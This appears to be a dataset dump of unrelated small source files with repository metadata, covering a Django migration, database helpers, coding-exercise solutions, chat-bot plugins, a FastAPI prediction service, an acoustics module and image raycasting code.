            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('contenu', models.TextField()),
                ('date_de_publication', models.DateField()),
                ('auteur', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.personne')),
            ],
        ),
        # Etudiant/Employe use multi-table inheritance from Personne
        # (parent_link OneToOneField + bases=('book.personne',)).
        migrations.CreateModel(
            name='Etudiant',
            fields=[
                ('personne_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='book.personne')),
                ('annee', models.IntegerField()),
                ('cursus', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.cursus')),
            ],
            bases=('book.personne',),
        ),
        migrations.CreateModel(
            name='Employe',
            fields=[
                ('personne_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='book.personne')),
                ('bureau', models.CharField(max_length=30)),
                ('campus', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.campus')),
                ('fonction', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.fonction')),
            ],
            bases=('book.personne',),
        ),
        migrations.AddField(
            model_name='personne',
            name='faculte',
            # NOTE(review): this FK is named 'faculte' but targets
            # book.fonction — confirm it should not point at book.faculte.
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='book.fonction'),
            preserve_default=False,
        ),
    ]
| [
"bleriaux@gmail.com"
] | bleriaux@gmail.com |
9d0b0a941398fd991247b3a0ec96412244d364c5 | 30fe7671b60825a909428a30e3793bdf16eaaf29 | /.metadata/.plugins/org.eclipse.core.resources/.history/9a/f0d15008ccf800161174a93fd5908e78 | 96f863b8b89de32901e8cf640c731bc4ebefeb38 | [] | no_license | abigdream84/PythonStudy | 0fc7a3b6b4a03a293b850d0ed12d5472483c4fb1 | 059274d3ba6f34b62ff111cda3fb263bd6ca8bcb | refs/heads/master | 2021-01-13T04:42:04.306730 | 2017-03-03T14:54:16 | 2017-03-03T14:54:16 | 79,123,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | #!/usr/bin/env python
#coding:UTF-8
from audit_demo.utility.MySqlHelper import MySqlHelper
class g_table(object):
    """Data-access object for the `g_table` groups table."""

    def __init__(self):
        # Thin wrapper around the project's MySQL helper; one per instance.
        self.__helper = MySqlHelper()

    def add_grp(self, gpname):
        """Insert a new group named `gpname`.

        Returns True on success, False when the insert failed
        (the error is printed, matching the other methods' style).
        """
        sql = 'insert into g_table(g_name) values(%s)'
        try:
            self.__helper.insert(sql, gpname)
            return True
        except Exception as e:
            print(e)
            return False

    def get_grp(self, gpname):
        """Fetch the group row(s) matching `gpname`.

        Returns whatever the helper's select() yields, or None when the
        query failed.
        """
        sql = 'select g_name from g_table where g_name = %s'
        # Bug fix: g_id must exist even when select() raises; previously the
        # except path fell through to `return g_id` and raised
        # UnboundLocalError, masking the real database error.
        g_id = None
        try:
            g_id = self.__helper.select(sql, gpname)
        except Exception as e:
            print(e)
        return g_id

    def upd_grp(self, g_name_old, g_name_new):
        """Rename the group `g_name_old` to `g_name_new` (errors are printed)."""
        sql = 'update g_table set g_name = %s where g_name = %s'
        params = (g_name_new, g_name_old)
        try:
            self.__helper.update(sql, params)
        except Exception as e:
            print(e)
# NOTE(review): import-time side effect — this opens a DB helper and inserts
# a row whenever the module is imported; looks like leftover manual testing.
# Consider guarding it with `if __name__ == '__main__':`.
t=g_table()
t.add_grp('gp1')
| [
"abigdream@hotmail.com"
] | abigdream@hotmail.com | |
d78e9b91414cf74ab0da36fd5f6de8f911a9e0cd | 53eee7eb899cb518983008532257037fb89def13 | /2579.count-total-number-of-colored-cells.py | eb2d7d5de90aeac6f2c95bbec4eef4b247461260 | [] | no_license | chenxu0602/LeetCode | 0deb3041a66cb15e12ed4585bbe0fefce5dc6b26 | 3dc5af2bc870fcc8f2142130fcd2b7cab8733151 | refs/heads/master | 2023-07-05T19:26:21.608123 | 2023-07-02T08:35:35 | 2023-07-02T08:35:35 | 233,351,978 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | #
# @lc app=leetcode id=2579 lang=python3
#
# [2579] Count Total Number of Colored Cells
#
# @lc code=start
class Solution:
    def coloredCells(self, n: int) -> int:
        """Number of colored cells after n minutes of diamond growth.

        The diamond of "radius" n is two centred squares overlaid, giving
        n*n + (n-1)*(n-1) cells — algebraically equal to 2*n*(n-1) + 1.
        """
        inner = n - 1
        return n * n + inner * inner
# @lc code=end
| [
"chenxu@MacBook-Pro.local"
] | chenxu@MacBook-Pro.local |
9676213e2d375101f59dd6bab0489d7659d49416 | f0d0e106204190927a3c2260f7d48e5c3dfa2896 | /general/plugins/keywords/greetings.py | 77af8574abc5a90df7bfcfe2aca1ed90a1f9662f | [
"MIT"
] | permissive | asagarasu/bungo-bot-DEPRECATED | 4d36c02ce57a1ced94581ad0600289686982d045 | e628d99ac3e1558f2214aebf22eff772a7d2e70c | refs/heads/master | 2022-11-26T12:42:39.437671 | 2020-08-05T03:16:42 | 2020-08-05T03:16:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,513 | py | from nonebot import on_command, CommandSession
from nonebot import on_natural_language, NLPSession, IntentCommand
from .data_source import *
from ...plugins import utils
# good morning
@on_command('morning', only_to_me=False)
async def morning(session: CommandSession):
    """Send a personalised good-morning reply to the requesting user."""
    keywords = await utils.load_keywords_data('greetings')
    greeting = await get_is_morning(keywords['morning'], session.get('user'))
    nickname = await utils.get_display_name(session)
    await session.send(nickname + greeting)
@on_natural_language(keywords={'早安', '早上好'}, only_to_me=False)
async def _(session: NLPSession):
    # Route to the `morning` command when the bot is addressed directly,
    # or with ~50% probability otherwise so it does not answer every
    # greeting in the chat.
    if session.event['to_me'] or utils.get_random_boolean(50):
        return IntentCommand(100.0, 'morning')
# good night
@on_command('night', only_to_me=False)
async def night(session: CommandSession):
    """Send a personalised good-night reply to the requesting user."""
    keywords = await utils.load_keywords_data('greetings')
    farewell = await get_is_night(keywords['night'], session.get('user'))
    nickname = await utils.get_display_name(session)
    await session.send(nickname + farewell)
@on_natural_language(keywords={'晚安', '睡了'}, only_to_me=False)
async def _(session: NLPSession):
    # Route to the `night` command when addressed directly, or with ~50%
    # probability otherwise.
    if session.event['to_me'] or utils.get_random_boolean(50):
        return IntentCommand(100.0, 'night')
# Shared argument parser for both greeting commands; presumably normalises
# the session state (e.g. populating the 'user' key read by the handlers
# above) — verify against plugins.utils.get_stated_session.
@morning.args_parser
@night.args_parser
async def _(session: CommandSession):
session = await utils.get_stated_session(session) | [
"yl668@cornell.edu"
] | yl668@cornell.edu |
de6c5c452f1a03fca9ef09e22250daceffcb4371 | 84c9a26a3fe11b79a5d326faf1bd2ddc43939d1a | /4 - Largest Palindrome Product.py | 2f5f06f759a2523231b1b690a98ce8ffed35d653 | [] | no_license | Fabhi/Project-Euler | 14be3bdd52f29980b1f0091c1399fac5b4d1c484 | 63ed63092481a398e605b27f06ccb7ee06d8cea5 | refs/heads/master | 2021-05-25T17:22:50.669975 | 2020-04-10T07:36:53 | 2020-04-10T07:36:53 | 253,841,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | # Problem 4 - Largest Palindrome Product
# https://projecteuler.net/problem=4
def brute(n):
    """Print the largest palindrome made from the product of two n-digit numbers.

    Project Euler #4 (HackerRank variant): exhaustively checks every pair of
    n-digit factors and prints the largest palindromic product, or -1 when
    none exists (which cannot happen for n >= 1).
    """
    lo = 10 ** (n - 1)  # smallest n-digit number (renamed: `min`/`max`
    hi = 10 ** n - 1    # shadowed the builtins in the original)
    largest = -1
    for i in range(lo, hi + 1):
        # Multiplication is commutative, so start j at i and skip the
        # mirrored half of the search space (same result, half the work).
        for j in range(i, hi + 1):
            product = i * j
            # Cheap numeric comparison first; build the string only if needed.
            if product > largest and str(product) == str(product)[::-1]:
                largest = product
    print(largest)


if __name__ == '__main__':
    # First line: number of test cases; then one digit-count n per line.
    t = int(input().strip())
    for _ in range(t):
        n = int(input().strip())
        brute(n)
| [
"43674998+Fabhi@users.noreply.github.com"
] | 43674998+Fabhi@users.noreply.github.com |
8fd2aadeb4b360d6fcfac9121c8abd2d093c7905 | db3a6ce7f0a8a4fbda6a34f269c390b47b963ed7 | /week2/Lab1/Ex18.py | 184ad4617bc18bd500d46fd9aeb7509a76b3736d | [] | no_license | vchatchai/bootcamp-ai | 3de48b924cb9c87a2ddc0c2cdf2ba363bbf11381 | cbbce004a9596b688ee04cdb10600f335b66a4c4 | refs/heads/master | 2020-04-08T01:50:10.511395 | 2018-12-22T09:33:59 | 2018-12-22T09:33:59 | 158,911,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | import tensorflow as tf
# Lab: create TF1 variables of increasing rank and print their values.
a = tf.Variable(2, name="scalar")
b = tf.Variable([2, 3], name="vector")
c = tf.Variable([[0, 1], [2, 3]], name="matrix")
W = tf.Variable(tf.zeros([784, 10]))  # 784x10 weight matrix of zeros

with tf.Session() as session:
    # Dump the graph so it can be inspected with TensorBoard.
    writer = tf.summary.FileWriter('graphs_ex18', session.graph)
    # Fix: TF1 variables must be initialized before they can be read;
    # without this every session.run(<variable>) raises
    # FailedPreconditionError ("Attempting to use uninitialized value").
    session.run(tf.global_variables_initializer())
    print(session.run(a))
    print(session.run(b))
    print(session.run(c))
    print(session.run(W))
    writer.close()
| [
"ee56054@gmail.com"
] | ee56054@gmail.com |
ee71aa08049ba4b1568dbc021cf751df09b669b7 | 5c073141a904824d97526cb7d5dbb996fbd86180 | /inagro_koordinasi_marketing/models/__init__.py | 786bf799cb30ebebb738bd2326741ea0b930fcce | [] | no_license | demodoo/inagro | 496eb5b52f200638b8153604e74aba37082b484f | 83af0baaff320e3620a9c2cf1ea871f59aab0c8f | refs/heads/master | 2022-04-10T04:38:26.745950 | 2020-03-19T09:42:12 | 2020-03-19T09:42:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | # -*- coding: utf-8 -*-
from . import models
from . import koordinasi_marketing | [
"rachmadona@rocketmail.com"
] | rachmadona@rocketmail.com |
7ef2da970532f6c751389f8b00288f1291af4e4f | b40c5846605fc0b0456dd99bb5e214eaefb1a067 | /test.py | c8b4006a863e754e7f97b992892ad3300fda1538 | [] | no_license | daaaaaun/python_section2 | 6153767110559c4f1abac61d4022d107566737d5 | dc5eeb1d3e00c06c8b50909927b43da99e2e989b | refs/heads/master | 2020-05-15T11:03:44.816503 | 2019-04-23T01:45:49 | 2019-04-23T01:45:49 | 182,210,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from tkinter import *
# Callback wired to the "Hello Python" button below; writes to stdout.
def printHello() :
    print('Hi')
# Build a minimal Tk window: one label and two buttons.
root = Tk()
w = Label(root, text="Python Test")
b = Button(root, text="Hello Python", command=printHello)
c = Button(root, text="Quit", command=root.quit)  # quit() ends mainloop
w.pack()
b.pack()
c.pack()
root.mainloop()  # blocks here until the window is closed or Quit is pressed
| [
"geeeeekirl@gmail.com"
] | geeeeekirl@gmail.com |
3c74be0064501659bed8cf392ce9d5f5ca0414a4 | bede337b5ee193bb5669c855b70a78d929dc5ae8 | /apps/one_password.py | ca9110f9a15ed7b774c7eb7f446788b5cfa0d019 | [
"0BSD"
] | permissive | dwiel/talon-user | ffe83c05e054626431fe12c14dbfe850950fa4c4 | 559617135408ea2ceafaef54564438405546f255 | refs/heads/master | 2020-09-12T22:58:36.575833 | 2019-11-19T17:12:05 | 2019-11-19T17:12:05 | 222,585,938 | 0 | 0 | NOASSERTION | 2019-11-19T02:00:20 | 2019-11-19T02:00:19 | null | UTF-8 | Python | false | false | 217 | py | from talon import ctrl
from talon.voice import Context, Key
from ..utils import text, delay
# Talon voice-command context, active while 1Password has focus.
ctx = Context("1password")
ctx.keymap({
    # Saying "password [dictation] [over]" presses shift-cmd-\ (1Password's
    # autofill hotkey), waits 0.2s for the UI, then types the dictated text.
    "password [<dgndictation>] [over]": [Key("shift-cmd-\\"), delay(0.2), text],
}) | [
"dwight.holman@workday.com"
] | dwight.holman@workday.com |
050f2631f6b47527fb3ebdc876e7b392d2199011 | 3ffb51fa2241cba9c9680ab01f8da4057861f849 | /collezione/migrations/0023_auto_20181102_1526.py | a6e5117963a13b170e60c828a4b8d205856cf3f5 | [] | no_license | mions1/Euros | a663d9e3a38de56c51091233e6b4fc6db3147fb2 | faa74139e178b2c9dc868a536518715bed91c676 | refs/heads/master | 2020-04-08T00:12:45.713416 | 2018-11-23T14:35:45 | 2018-11-23T14:35:45 | 158,842,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | # Generated by Django 2.1.2 on 2018-11-02 15:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated: adds a purchase price to Acquisto, gives its date a
    # callable default, and makes the price on Possiede nullable.
    dependencies = [
        ('collezione', '0022_auto_20181030_2030'),
    ]
    operations = [
        migrations.AddField(
            model_name='acquisto',
            name='prezzo',
            field=models.FloatField(default=0.0),
        ),
        migrations.AlterField(
            model_name='acquisto',
            name='data',
            # timezone.now is passed as a callable: evaluated per row at save
            # time, not frozen once when the migration was written.
            field=models.DateField(default=django.utils.timezone.now),
        ),
        migrations.AlterField(
            model_name='possiede',
            name='prezzo',
            field=models.FloatField(default=0.0, null=True),
        ),
    ]
| [
"simone.mione1@gmail.com"
] | simone.mione1@gmail.com |
c2c993bd9480693f0aedbb0ebbc44370c176aa60 | b7263dff34b5ae90151494fa549b2c73164798be | /app/main.py | c9adc1eeb34540f06df3d3223acc4e908b180b66 | [] | no_license | FrankFacundo/StudyCaseTennis | 73e973c85db9f9749804adb875ecb838a7dd5b04 | 161f84fe8c28844b50e365f761ede35af5fdd3b6 | refs/heads/master | 2023-08-11T00:23:49.465525 | 2021-10-04T10:10:21 | 2021-10-04T10:10:21 | 413,368,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | from fastapi import FastAPI
from fastapi.responses import Response
from pydantic import BaseModel
from .service import predict
ROOT_PATH = '/api/atp'
class PredictPayload(BaseModel):
    """Request body for POST /predict/: the two player names to compare."""
    # pydantic fields — validated/deserialized from the incoming JSON
    player1: str
    player2: str
app = FastAPI(root_path = ROOT_PATH)
@app.get('/')
async def health_check():
    """Liveness probe: always replies 200 with plain-text body 'OK'."""
    return Response(content='OK', status_code=200)
@app.post('/predict/')
async def handlerpredict(payload: PredictPayload):
    """Return which player the model predicts as the winner.

    A truthy value from `predict` maps to player 2, falsy to player 1.
    NOTE(review): `predict` is called synchronously inside an async handler;
    if it is slow it blocks the event loop — consider a threadpool executor.
    """
    prediction = predict(payload)
    if prediction:
        return "The winner is the player 2. "
    return "The winner is the player 1. "
| [
"frank.f96@hotmail.com"
] | frank.f96@hotmail.com |
e15e6514b4d3e4de62be7407d959cb6a4af1cd0b | 4c5577b648b3505c7201ccb41de33866d300f92c | /venv/bin/chardetect | c9b0446b0a5ca36d2e8fd74974a6c6fa87dfc101 | [] | no_license | 9polymath/nine-app | 371e0c28102d3976f1ccd7e51251f49a50ea1ee0 | 62ed2c6638c7111c8375a0d8b98390b6ec57e265 | refs/heads/master | 2023-04-02T04:38:01.439184 | 2021-04-16T14:32:44 | 2021-04-16T14:32:44 | 358,627,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | #!/Users/dolapoolaniawo/Desktop/nine-app/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
# Console-script entry point (the stub pip/setuptools generates for
# `chardetect`); delegates straight to chardet's CLI.
if __name__ == '__main__':
    # Strip the "-script.py"/".exe" suffix that Windows launchers append so
    # the CLI reports the plain command name in usage/help output.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"43099885+Dolapola@users.noreply.github.com"
] | 43099885+Dolapola@users.noreply.github.com | |
3fba9be745d062af4a6987c3b56215f6fe18440e | 346f7dde9df3e0d72b5a9d78212f5f57db1678fd | /venv/Lib/site-packages/acoustics/atmosphere.py | 1e356059fa2af74773c328036a92793118629286 | [] | no_license | Kejzin/Thesis | b844d05488a259a1de5c2d347f3bed8ec0194a51 | cb148c09b1c3746c9aca58f86f0eecf7109a9b93 | refs/heads/master | 2022-01-07T22:48:28.458561 | 2019-07-16T13:15:43 | 2019-07-16T13:15:43 | 155,840,718 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,350 | py | """
Atmosphere
==========
The atmosphere module contains functions and classes related to atmospheric
acoustics and is based on :mod:`acoustics.standards.iso_9613_1_1993`.
Atmosphere class
****************
.. autoclass:: acoustics.atmosphere.Atmosphere
From ISO 9613-1 1993
********************
Constants
---------
.. autoattribute:: acoustics.standards.iso_9613_1_1993.SOUNDSPEED
.. autoattribute:: acoustics.standards.iso_9613_1_1993.REFERENCE_TEMPERATURE
.. autoattribute:: acoustics.standards.iso_9613_1_1993.REFERENCE_PRESSURE
.. autoattribute:: acoustics.standards.iso_9613_1_1993.TRIPLE_TEMPERATURE
Functions
---------
.. autofunction:: acoustics.standards.iso_9613_1_1993.soundspeed
.. autofunction:: acoustics.standards.iso_9613_1_1993.saturation_pressure
.. autofunction:: acoustics.standards.iso_9613_1_1993.molar_concentration_water_vapour
.. autofunction:: acoustics.standards.iso_9613_1_1993.relaxation_frequency_nitrogen
.. autofunction:: acoustics.standards.iso_9613_1_1993.relaxation_frequency_oxygen
.. autofunction:: acoustics.standards.iso_9613_1_1993.attenuation_coefficient
"""
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
import acoustics
from acoustics.standards.iso_9613_1_1993 import *
class Atmosphere(object):
    """
    Class describing atmospheric conditions.
    """
    REF_TEMP = 293.15
    """Reference temperature"""
    REF_PRESSURE = 101.325
    """International Standard Atmosphere in kilopascal"""
    TRIPLE_TEMP = 273.16
    """Triple point isotherm temperature."""
    def __init__(self,
                 temperature=REFERENCE_TEMPERATURE,
                 pressure=REFERENCE_PRESSURE,
                 relative_humidity=0.0,
                 reference_temperature=REFERENCE_TEMPERATURE,
                 reference_pressure=REFERENCE_PRESSURE,
                 triple_temperature=TRIPLE_TEMPERATURE):
        """
        :param temperature: Temperature in kelvin
        :param pressure: Pressure
        :param relative_humidity: Relative humidity
        :param reference_temperature: Reference temperature.
        :param reference_pressure: Reference pressure.
        :param triple_temperature: Triple temperature.
        """
        # Defaults are the ISO 9613-1:1993 constants star-imported above.
        self.temperature = temperature
        """Ambient temperature :math:`T`."""
        self.pressure = pressure
        """Ambient pressure :math:`p_a`."""
        self.relative_humidity = relative_humidity
        """Relative humidity"""
        self.reference_temperature = reference_temperature
        """
        Reference temperature.
        """
        self.reference_pressure = reference_pressure
        """
        Reference pressure.
        """
        self.triple_temperature = triple_temperature
        """
        Triple temperature.
        """
    def __repr__(self):
        return "Atmosphere{}".format(self.__str__())
    def __str__(self):
        return "(temperature={}, pressure={}, relative_humidity={}, " \
               "reference_temperature={}, reference_pressure={}, " \
               "triple_temperature={})".format(self.temperature, self.pressure,
                                               self.relative_humidity,
                                               self.reference_temperature,
                                               self.reference_pressure,
                                               self.triple_temperature)
    def __eq__(self, other):
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable in Python 3 (__hash__ is implicitly set to None).
        return self.__dict__ == other.__dict__ and self.__class__ == other.__class__
    @property
    def soundspeed(self):
        """
        Speed of sound :math:`c`.
        The speed of sound is calculated using :func:`acoustics.standards.iso_9613_1_1993.soundspeed`.
        """
        return soundspeed(self.temperature, self.reference_temperature)
    @property
    def saturation_pressure(self):
        """
        Saturation pressure :math:`p_{sat}`.
        The saturation pressure is calculated using :func:`acoustics.standards.iso_9613_1_1993.saturation_pressure`.
        """
        return saturation_pressure(self.temperature, self.reference_pressure, self.triple_temperature)
    @property
    def molar_concentration_water_vapour(self):
        """
        Molar concentration of water vapour :math:`h`.
        The molar concentration of water vapour is calculated using :func:`acoustics.standards.iso_9613_1_1993.molar_concentration_water_vapour`.
        """
        return molar_concentration_water_vapour(self.relative_humidity, self.saturation_pressure, self.pressure)
    @property
    def relaxation_frequency_nitrogen(self):
        """
        Resonance frequency of nitrogen :math:`f_{r,N}`.
        The resonance frequency is calculated using :func:`acoustics.standards.iso_9613_1_1993.relaxation_frequency_nitrogen`.
        """
        return relaxation_frequency_nitrogen(self.pressure, self.temperature, self.molar_concentration_water_vapour, self.reference_pressure, self.reference_temperature)
    @property
    def relaxation_frequency_oxygen(self):
        """
        Resonance frequency of oxygen :math:`f_{r,O}`.
        The resonance frequency is calculated using :func:`acoustics.standards.iso_9613_1_1993.relaxation_frequency_oxygen`.
        """
        return relaxation_frequency_oxygen(self.pressure, self.molar_concentration_water_vapour, self.reference_pressure)
    def attenuation_coefficient(self, frequency):
        """
        Attenuation coefficient :math:`\\alpha` describing atmospheric absorption in dB/m as function of ``frequency``.
        :param frequency: Frequencies to be considered.
        The attenuation coefficient is calculated using :func:`acoustics.standards.iso_9613_1_1993.attenuation_coefficient`.
        """
        return attenuation_coefficient(self.pressure, self.temperature, self.reference_pressure, self.reference_temperature, self.relaxation_frequency_nitrogen, self.relaxation_frequency_oxygen, frequency)
    def frequency_response(self, distance, frequencies, inverse=False):
        """Frequency response.
        :param distance: Distance between source and receiver.
        :param frequencies: Frequencies for which to compute the response.
        :param inverse: Whether the attenuation should be undone.
        """
        return frequency_response(self, distance, frequencies, inverse)
    def impulse_response(self, distance, fs, ntaps=None, inverse=False):
        """Impulse response of sound travelling through `atmosphere` for a given `distance` sampled at `fs`.
        :param atmosphere: Atmosphere.
        :param distance: Distance between source and receiver.
        :param fs: Sample frequency
        :param ntaps: Amount of taps.
        :param inverse: Whether the attenuation should be undone.
        .. seealso:: :func:`impulse_response`
        """
        return impulse_response(self, distance, fs, ntaps, inverse)
    def plot_attenuation_coefficient(self, frequency):
        """
        Plot the attenuation coefficient :math:`\\alpha` as function of frequency and return the figure.
        :param frequency: Frequencies
        .. note:: The attenuation coefficient is plotted in dB/km!
        """
        fig = plt.figure()
        ax0 = fig.add_subplot(111)
        ax0.plot(frequency, self.attenuation_coefficient(frequency)*1000.0)
        ax0.set_xscale('log')
        ax0.set_yscale('log')
        ax0.set_xlabel(r'$f$ in Hz')
        ax0.set_ylabel(r'$\alpha$ in dB/km')
        ax0.legend()  # NOTE(review): no labelled artists — this warns and draws nothing.
        return fig
def frequency_response(atmosphere, distance, frequencies, inverse=False):
    """Single-sided frequency response.

    :param atmosphere: Atmosphere providing ``attenuation_coefficient`` (dB/m).
    :param distance: Distance between source and receiver.
    :param frequencies: Frequencies for which to compute the response.
    :param inverse: Whether the attenuation should be undone.
    :returns: Linear magnitude transfer function at ``frequencies``.
    """
    # Attenuation in dB accumulated over the travelled distance.
    attenuation_db = distance * atmosphere.attenuation_coefficient(frequencies)
    if inverse:
        exponent = attenuation_db / 20.0      # undo the attenuation
    else:
        exponent = -attenuation_db / 20.0     # apply the attenuation
    return 10.0 ** exponent
def impulse_response(atmosphere, distance, fs, ntaps, inverse=False):
    """Impulse response of sound travelling through `atmosphere` for a given `distance` sampled at `fs`.

    :param atmosphere: Atmosphere.
    :param distance: Distance between source and receiver.
    :param fs: Sample frequency
    :param ntaps: Amount of taps (required; passed to ``np.fft.rfftfreq``).
    :param inverse: Whether the attenuation should be undone.

    The attenuation is calculated for a set of positive frequencies. Because the attenuation is the same for the negative frequencies, we have Hermitian symmetry.
    The attenuation is entirely real-valued. We like to have a constant group delay and therefore we need a linear-phase filter.
    This function creates a zero-phase filter, which is the special case of a linear-phase filter with zero phase slope.
    The type of filter is non-causal.
    The impulse response of the filter is made causal by rotating it by M/2 samples and discarding the imaginary parts.
    A real, even impulse response corresponds to a real, even frequency response.
    """
    # Frequencies vector with positive frequencies only.
    frequencies = np.fft.rfftfreq(ntaps, 1./fs)
    # Single-sided spectrum. Negative frequencies have the same values.
    tf = frequency_response(atmosphere, distance, frequencies, inverse)
    # Impulse response. We design a zero-phase filter (linear-phase with zero slope).
    # We need to shift the IR to make it even. Taking the real part should not be necessary, see above.
    #ir = np.fft.ifftshift(np.fft.irfft(tf, n=ntaps)).real
    ir = acoustics.signal.impulse_response_real_even(tf, ntaps=ntaps)
    return ir
# Public API of this module.
# BUGFIX: the original listed 'REFERENCE_TEMPERATURE' twice; the duplicate
# entry is removed (it added nothing and hid whatever name was intended).
__all__ = ['Atmosphere', 'SOUNDSPEED', 'REFERENCE_TEMPERATURE',
           'TRIPLE_TEMPERATURE',
           'soundspeed', 'saturation_pressure',
           'molar_concentration_water_vapour',
           'relaxation_frequency_oxygen',
           'relaxation_frequency_nitrogen',
           'attenuation_coefficient',
           'impulse_response',
           'frequency_response'
           ]
| [
"kejzin@gmail.com"
] | kejzin@gmail.com |
85c0339de8aef3f58ff161db5ea598675a6d7713 | 09cdc41b2a080a6f12e2a5042e44f6070b65816b | /Raycast.py | c60bf7dad4acc548975beed89e8da6e76afe4bb9 | [] | no_license | lameski123/spine_registration | dd9bff81010fa36c7c2631acdee30095f48c32be | 761801f116a5b1d0baf033b109f387327d68e1eb | refs/heads/main | 2023-08-17T23:46:26.533663 | 2021-09-15T20:02:58 | 2021-09-15T20:02:58 | 330,981,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,729 | py | import imfusion
import numpy as np
def raycast(image, rays):
    """Mark, for every column of ``image``, the first (top-most) non-zero
    pixel with 1 in ``rays``.

    :param image: 2-D array, scanned column by column from row 0 downwards.
    :param rays: 2-D output array of the same shape; modified in place
        (pre-existing entries elsewhere are left untouched).
    :returns: ``rays`` (the same object that was passed in).
    """
    mask = image != 0
    hit = mask.any(axis=0)            # columns that contain at least one non-zero pixel
    first_row = mask.argmax(axis=0)   # argmax on bool gives the first True per column
    cols = np.nonzero(hit)[0]
    # Vectorised replacement of the original O(rows*cols) Python loop.
    rays[first_row[cols], cols] = 1
    return rays
def multi_raycast(image, rays):
    """Per-label raycast: for every label value present in ``image``, mark in
    each column the first (top-most) pixel carrying that label with the label
    value itself in ``rays``.

    :param image: 2-D label image (0 is treated as background).
    :param rays: 2-D output array of the same shape; modified in place.
    :returns: ``rays`` (the same object that was passed in).

    BUGFIX: the original did ``np.delete(uni, 0)``, which drops the smallest
    unique value unconditionally — a real label if no background 0 is present.
    Here only the explicit background value 0 is excluded.
    """
    labels = np.unique(image)
    labels = labels[labels != 0]      # drop only the background label
    # NOTE: the axis iterated over depends on the image orientation
    # (check positioning in ImFusion first, then adapt the axes).
    for label in labels:
        mask = image == label
        hit = mask.any(axis=0)
        first_row = mask.argmax(axis=0)
        cols = np.nonzero(hit)[0]
        rays[first_row[cols], cols] = label
    return rays
def blur(a):
    """Apply a normalised 3x3 Gaussian blur (kernel [[1,2,1],[2,4,2],[1,2,1]]/16)
    with circular (wrap-around) boundary handling.

    :param a: 2-D input array.
    :returns: Blurred array of the same shape (float).
    """
    weights = np.array([[1.0, 2.0, 1.0],
                        [2.0, 4.0, 2.0],
                        [1.0, 2.0, 1.0]])
    weights = weights / np.sum(weights)
    result = np.zeros(a.shape)
    # Accumulate the nine shifted-and-weighted copies directly instead of
    # stacking them and summing at the end.
    for dy in range(3):
        for dx in range(3):
            result = result + np.roll(a, (dy - 1, dx - 1), axis=(0, 1)) * weights[dy, dx]
    return result
class RayCast(imfusion.Algorithm):
    """ImFusion algorithm wrapper: runs :func:`raycast` slice by slice on
    every image of a shared image set and collects the resulting ray masks."""

    def __init__(self, data):
        super().__init__()
        self.imageset = data
        self.imageset_out = imfusion.SharedImageSet()
        # self.axis = data[1]

    @classmethod
    def convert_input(cls, data):
        # Input is accepted as-is (the single-image validation is disabled).
        return data

    def compute(self):
        # Discard the results of any previous run.
        self.imageset_out.clear()
        # Process every image in the set individually.
        for shared_image in self.imageset:
            volume = np.squeeze(np.array(shared_image))  # creates a copy
            ray_mask = np.zeros_like(volume)             # empty output image
            # The index into volume.shape and the axis iterated over depend on
            # the image orientation — check in ImFusion first, then adapt.
            print(volume.shape)
            for slice_index in range(volume.shape[0]):
                ray_mask[slice_index, :, :] = raycast(volume[slice_index, :, :],
                                                      ray_mask[slice_index, :, :])
            # Carry the spacing and the transform matrix over to the output.
            result = imfusion.SharedImage(np.expand_dims(ray_mask, axis=-1))
            result.spacing = shared_image.spacing
            result.matrix = shared_image.matrix
            self.imageset_out.add(result)

    def output(self):
        return [self.imageset_out]
imfusion.registerAlgorithm('Raycast', RayCast) | [
"jane.lameski96@gmail.com"
] | jane.lameski96@gmail.com |
c4c16a9d18247fc0618fd0cc14b6c52da311ea20 | 99d4558fcdfe787f950a687d4a06505274e17252 | /VGGNet.py | 5dab1a725f0a2a4a8424f97e1c6a53e424f0c6b4 | [
"BSD-3-Clause"
] | permissive | LHQ0308/EmotionClassification_FER2013 | 8ea0085036b3cd78e844572987a2e8a690c8e69b | 29bda4caaea26b40f75aae253ec292eb846a93df | refs/heads/master | 2020-04-24T13:58:39.912967 | 2018-08-06T16:44:06 | 2018-08-06T16:44:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,127 | py | """
" License:
" -----------------------------------------------------------------------------
" Copyright (c) 2018, Ratnajit Mukherjee.
" All rights reserved.
"
" Redistribution and use in source and binary forms, with or without
" modification, are permitted provided that the following conditions are met:
"
" 1. Redistributions of source code must retain the above copyright notice,
" this list of conditions and the following disclaimer.
"
" 2. Redistributions in binary form must reproduce the above copyright notice,
" this list of conditions and the following disclaimer in the documentation
" and/or other materials provided with the distribution.
"
" 3. Neither the name of the copyright holder nor the names of its contributors
" may be used to endorse or promote products derived from this software
" without specific prior written permission.
"
